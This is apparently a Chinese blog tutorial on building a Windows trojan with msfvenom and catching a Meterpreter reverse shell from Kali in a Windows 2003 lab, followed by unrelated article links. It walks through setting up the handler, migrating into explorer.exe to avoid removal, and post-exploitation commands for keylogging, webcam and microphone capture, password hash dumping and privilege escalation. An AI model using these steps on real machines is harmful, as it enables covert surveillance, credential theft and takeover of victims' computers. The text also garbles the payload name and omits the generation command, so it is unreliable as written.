实验环境:

虚拟机:kali  (攻击机)           192.168.1.2

虚拟机:windwos 2003 (靶机)   192.168.1.100

1. 制作木马

说明: -p payload(有效载荷)

-e  编码方式

-i 编码次数

-b 在生成的程序中避免出现的值

-f exe 生成EXE的格式

输入命令之后会在home中生成一个 exe的文件

2.

然后在终端输入:msfconsole

然后 use exploit/multi/handler

然后 set payload windows/meterpreter/reverset_tcp

然后 set LHOST

然后 set LPORT

在run运行

3. 将制作的木马放在 windows server2003 ,运行之后,什么也不显示。但是这个时候你就会发现kali这边就已经上线了。

成功获取最高权限,可以做一切你想做的事。

上线之后,由于你的程序木马单独的存在被攻击电脑中,所以容易被清除,这个时候你需要 注入到被攻击者自带的某个程序中,如桌面程序(explorer.exe) ,利用ps命令 ,找到这个进程并记住这个程序的PID。然后 Migrate (迁移) pid 。

然后就实行以下的一些功能:

run vnc   开启远程桌面

sysinfo  获取电脑信息

reboot  重启电脑

shell 获取shell

shutdown  关闭电脑

enumdesktops      --用户登录数

keyscan_dump   键盘记录-下载

keyscan_start   键盘记录 - 开始

keyscan_stop    键盘记录 - 停止

Uictl       获取键盘鼠标控制权

record_mic    音频录制

webcam_chat   查看摄像头接口

webcam_list   查看摄像头列表

webcam_stream  摄像头视频获取

Getsystem    获取高权限

Hashdump   下载HASH

最新文章

  1. python基础-编码_if条件判断
  2. 初识UIScrollView
  3. netty-socketio使用namespace
  4. MySQL监控工具-orzdba
  5. Nginx - Additional Modules, About Your Visitors
  6. Error LNK2001 无法解析的外部符号 的几种情况及解决办法
  7. JSP九大内置对象详解
  8. Lucene索引的初步创建
  9. COJ 1010 WZJ的数据结构(十) 线段树区间操作
  10. 在eclipse中创建web项目
  11. Java程序设计---io流读取文件内容并将其逆值输出到控制台
  12. C++编程理论学习笔记
  13. ryzen nvidia hackintosh
  14. C#字符串操作方法签名等
  15. taskService 流程任务组件
  16. P2163 [SHOI2007]园丁的烦恼(cdq分治)
  17. 微信发送红包示例(php)
  18. HANA私有云解决方案
  19. Arduino入门笔记(9):蓝牙模块及第一辆蓝牙遥控小车
  20. Js 动态设置DIV日期信息

热门文章

  1. python编程基础:《http://www.cnblogs.com/wiki-royzhang/category/466416.html》
  2. 【BZOJ1222】[HNOI2001]产品加工 DP
  3. 【Java线程】锁机制:synchronized、Lock、Condition(转)
  4. (转)浅析三层架构与MVC模式的区别
  5. PAT天梯赛 L2-020. 功夫传人 【DFS】
  6. git用远程库的内容覆盖本地
  7. github 博客模板
  8. PS图片透明处理方法
  9. Spring Boot2.0之整合log4j
  10. Winfrom和控制台中static修饰方法的问题